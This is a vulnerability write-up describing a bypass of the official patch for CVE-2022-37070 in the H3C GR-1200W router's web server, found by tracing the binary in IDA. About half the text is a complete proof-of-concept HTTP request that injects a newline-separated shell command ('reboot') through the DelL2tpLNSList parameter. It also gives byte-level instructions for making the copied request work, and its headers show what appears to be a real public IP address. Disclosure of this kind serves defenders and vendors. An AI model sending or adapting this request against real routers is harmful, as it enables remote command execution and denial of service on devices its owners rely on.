This is a method to bypass the official patch for CVE-2022-37070

Vulnerability introduction

The H3C GR-1200W was found to contain a critical vulnerability that allows remote code execution (RCE) via the aspForm parameter

Official website : https://www.h3c.com/

Download link: H3C MiniGRW1A0V100R008 version software and manual - New H3C Group - H3C

H3C MiniGRW1A0V100R008 is the latest firmware version for the GR-1200W

Vulnerability analysis

DelL2tpLNSList parameter in the function sub_46F0A8

In the binary /bin/webs, we use IDA to locate the function sub_46F0A8 that contains the vulnerability.

As you can see, snprintf is called on line 36 of sub_46F0A8. Let's trace where its arguments come from.

We found that the values of v14 and v15 are derived from the request parameter, and that the check function sub_46F3F0 (the official patch for CVE-2022-37070) can be bypassed by inserting a newline byte (0x0a) into the parameter value. Since the shell treats a newline as a command separator, the text after the 0x0a is executed as a separate command, like this

The image shows the router rebooting after the reboot command is executed

The POC is as follows:

POST /goform/aspForm HTTP/1.1
Host:
Cookie: JSESSIONID=4b159886
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://114.241.54.34:8989
Referer: https://114.241.54.34:8989/vpn_l2tp_lac.asp
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
Te: trailers
Connection: close

CMD=DelL2tpLNSList&param=1;
reboot;

Note that when copying this POC, an extra 0x0d (CR) byte ends up after 'param=1;', just before the 0x0a; delete that byte so only the bare newline separates the two commands. The body is then 35 bytes, so Content-Length has to be adjusted to match (Burp Repeater does this automatically when the request is edited).